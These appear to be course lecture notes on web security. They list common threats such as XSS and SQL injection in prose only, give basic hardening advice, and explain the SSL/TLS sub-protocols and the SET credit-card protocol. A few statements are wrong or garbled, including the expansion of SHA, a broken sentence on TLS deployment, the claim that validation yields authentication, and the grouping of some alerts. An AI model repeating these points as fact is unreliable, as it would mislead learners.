Unit 4: Web Security

What is Web Security?

Web Security is an online security solution that will restrict access to harmful websites, stop
web-based risks, and manage staff internet usage. Web Security is very important
nowadays. Websites are always prone to security threats/risks. For example- when you are
transferring data between client and server and you have to protect that data that security of
data is your web security.
What is a Security Threat

A threat is nothing but a possible event that can damage and harm an information system. A
security Threat is defined as a risk that, can potentially harm Computer systems & organizations.
Whenever an individual or an organization creates a website, they are vulnerable to security
attacks. Security attacks are mainly aimed at stealing altering or destroying a piece of personal and
confidential information, stealing the hard drive space, and illegally accessing passwords. So
whenever the website you created is vulnerable to security attacks then the attacks are going to
steal your data alter your data destroy your personal information see your confidential information
and also it accessing your password.
Top Web Security Threats
● Cross-site scripting (XSS)
● SQL Injection
● Phishing
● Ransomware
● Code Injection
● Viruses and worms
● Spyware
● Denial of Service
Security Consideration
● Updated Software: You need to always update your software. Hackers may be aware of vulnerabilities in
certain software, which are sometimes caused by bugs and can be used to damage your computer system
and steal personal data. Older versions of software can become a gateway for hackers to enter your
network. Software makers soon become aware of these vulnerabilities and will fix vulnerable or exposed
areas. That’s why It is mandatory to keep your software updated, It plays an important role in keeping your
personal data secure.
● Beware of SQL Injection: SQL Injection is an attempt to manipulate your data or your database by
inserting a rough code into your query. For e.g. somebody can send a query to your website and this query
can be a rough code while it gets executed it can be used to manipulate your database such as change
tables, modify or delete data or it can retrieve important information also so, one should be aware of the
SQL injection attack.
● Cross-Site Scripting (XSS): XSS allows the attackers to insert client-side script into web pages. E.g.
Submission of forms. It is a term used to describe a class of attacks that allow an attacker to inject
client-side scripts into other users’ browsers through a website. As the injected code enters the browser
from the site, the code is reliable and can do things like sending the user’s site authorization cookie to the
attacker.
Error Messages: You need to be very careful about error messages which are generated to give the
information to the users while users access the website and some error messages are generated due to
one or another reason and you should be very careful while providing the information to the users. For
e.g. login attempt – If the user fails to login the error message should not let the user know which field is
incorrect: Username or Password.

Data Validation: Data validation is the proper testing of any input supplied by the user or application. It
prevents improperly created data from entering the information system. Validation of data should be
performed on both server-side and client-side. If we perform data validation on both sides that will give us
the authentication. Data validation should occur when data is received from an outside party, especially if
the data is from untrusted sources.

Password: Password provides the first line of defense against unauthorized access to your device and
personal information. It is necessary to use a strong password. Hackers in many cases use complex
software that uses brute force to crack passwords. Passwords must be complex to protect against brute
force. It is good to enforce password requirements such as a minimum of eight characters long must
including uppercase letters, lowercase letters, special characters, and numerals.
Secure Socket Layer (SSL)

SSL or Secure Sockets Layer, is an Internet security protocol that encrypts data to keep it safe. It was
created by Netscape in 1995 to ensure privacy, authentication, and data integrity in online
communications. SSL is the older version of what we now call TLS (Transport Layer Security).

Websites using SSL/TLS have “HTTPS” in their URL instead of “HTTP.”

Working of SSL
● Encryption: SSL encrypts data transmitted over the web, ensuring privacy. If someone intercepts
the data, they will see only a jumble of characters that is nearly impossible to decode.
● Authentication: SSL starts an authentication process called a handshake between two devices to
confirm their identities, making sure both parties are who they claim to be.
● Data Integrity: SSL digitally signs data to ensure it hasn’t been tampered with, verifying that the
data received is exactly what was sent by the sender.
Secure Socket Layer Protocols

SSL Record Protocol

SSL Record provides two services to SSL connection.

● Confidentiality
● Message Integrity

In the SSL Record Protocol application data is divided into fragments. The fragment is compressed and
then encrypted MAC (Message Authentication Code) generated by algorithms like SHA (Secure Hash
Protocol) and MD5 (Message Digest) is appended. After that encryption of the data is done and in last
SSL header is appended to the data.
Handshake Protocol
Handshake Protocol is used to establish sessions. This protocol allows the client and server to
authenticate each other by sending a series of messages to each other. Handshake protocol uses
four phases to complete its cycle.

● Phase-1: In Phase-1 both Client and Server send hello-packets to each other. In this IP
session, cipher suite and protocol version are exchanged for security purposes.
● Phase-2: Server sends it certificate and Server-key-exchange. The server end phase-2 by
sending the Server-hello-end packet.
● Phase-3: In this phase, Client replies to the server by sending it certificate and
Client-exchange-key.
● Phase-4: In Phase-4 Change Cipher Spec occurs and after this the Handshake Protocol
ends.
Change-Cipher Protocol
This protocol uses the SSL record protocol. Unless Handshake Protocol is completed, the SSL
record Output will be in a pending state. After the handshake protocol, the Pending state is
converted into the current state.
Change-cipher protocol consists of a single message which is 1 byte in length and can have only
one value. This protocol’s purpose is to cause the pending state to be copied into the current state.
Alert Protocol
This protocol is used to convey SSL-related alerts to the peer entity. Each message in this
protocol contains 2 bytes.

The level is further classified into two parts:

Warning (level = 1)
This Alert has no impact on the connection between sender and receiver. Some of them are:

● Bad Certificate: When the received certificate is corrupt.

● No Certificate: When an appropriate certificate is not available.
● Certificate Expired: When a certificate has expired.
● Certificate Unknown: When some other unspecified issue arose in processing the
certificate, rendering it unacceptable.
● Close Notify: It notifies that the sender will no longer send any messages in the connection.
● Unsupported Certificate: The type of certificate received is not supported.
● Certificate Revoked: The certificate received is in revocation list.
Fatal Error (level = 2):
This Alert breaks the connection between sender and receiver. The connection will be stopped,
cannot be resumed but can be restarted. Some of them are :
● Handshake Failure: When the sender is unable to negotiate an acceptable set of security
parameters given the options available.
● Decompression Failure: When the decompression function receives improper input.
● Illegal Parameters: When a field is out of range or inconsistent with other fields.
● Bad Record MAC: When an incorrect MAC was received.
● Unexpected Message: When an inappropriate message is received.
The second byte in the Alert protocol describes the error.

Salient Features of Secure Socket Layer

● The advantage of this approach is that the service can be tailored to the specific needs of
the given application.
● Secure Socket Layer was originated by Netscape.
● SSL is designed to make use of TCP to provide reliable end-to-end secure service.
● This is a two-layered protocol.
SSL Certificate
SSL (Secure Sockets Layer) certificate is a digital certificate used to secure and verify the identity of a
website or an online service. The certificate is issued by a trusted third-party called a Certificate Authority
(CA), who verifies the identity of the website or service before issuing the certificate.
Transport Layer Security (TLS)
Transport Layer Securities (TLS) are designed to provide security at the transport layer. TLS was derived
from a security protocol called Secure Socket Layer (SSL). TLS ensures that no third party may
eavesdrop or tampers with any message.

There are several benefits of TLS:

● Encryption:
TLS/SSL can help to secure transmitted data using encryption.
● Interoperability:
TLS/SSL works with most web browsers, including Microsoft Internet Explorer and on most
operating systems and web servers.
● Algorithm flexibility:
TLS/SSL provides operations for authentication mechanism, encryption algorithms and hashing
algorithm that are used during the secure session.
● Ease of Deployment:
Many applications TLS/SSL temporarily on a windows server 2003 operating systems.
● Ease of Use:
Because we implement TLS/SSL beneath the application layer, most of its operations are
completely invisible to client.
Secure Electronic Transaction (SET) Protocol

Secure Electronic Transaction or SET is a security protocol designed to ensure the security and
integrity of electronic transactions conducted using credit cards. Unlike a payment system, SET
operates as a security protocol applied to those payments. It uses different encryption and hashing
techniques to secure payments over the internet done through credit cards. The SET protocol was
supported in development by major organizations like Visa, Mastercard, and Microsoft which
provided its Secure Transaction Technology (STT), and Netscape which provided the technology of
Secure Socket Layer (SSL).

SET protocol restricts the revealing of credit card details to merchants thus keeping hackers and
thieves at bay. The SET protocol includes Certification Authorities for making use of standard
Digital Certificates like X.509 Certificate.
Requirements in SET: The SET protocol has some requirements to meet, some of the important
requirements are:

● It has to provide mutual authentication i.e., customer (or cardholder) authentication by

confirming if the customer is an intended user or not, and merchant authentication.
● It has to keep the PI (Payment Information) and OI (Order Information) confidential by
appropriate encryptions.
● It has to be resistive against message modifications i.e., no changes should be allowed in the
content being transmitted.
● SET also needs to provide interoperability and make use of the best security mechanisms.
Participants in SET: In the general scenario of online transactions, SET includes similar
participants:

1. Cardholder – customer
2. Issuer – customer financial institution
3. Merchant
4. Acquirer – Merchant financial
5. Certificate authority – Authority that follows certain standards and issues certificates(like
X.509V3) to all other participants.
SET functionalities:
● Provide Authentication
○ Merchant Authentication – To prevent theft, SET allows customers to check previous
relationships between merchants and financial institutions. Standard X.509V3
certificates are used for this verification.
○ Customer / Cardholder Authentication – SET checks if the use of a credit card is
done by an authorized user or not using X.509V3 certificates.
● Provide Message Confidentiality: Confidentiality refers to preventing unintended people
from reading the message being transferred. SET implements confidentiality by using
encryption techniques. Traditionally DES is used for encryption purposes.
● Provide Message Integrity: SET doesn’t allow message modification with the help of
signatures. Messages are protected against unauthorized modification using RSA digital
signatures with SHA-1 and some using HMAC with SHA-1,
Dual Signature: The dual signature is a concept introduced with SET, which aims at connecting
two information pieces meant for two different receivers :
Order Information (OI) for merchant
Payment Information (PI) for bank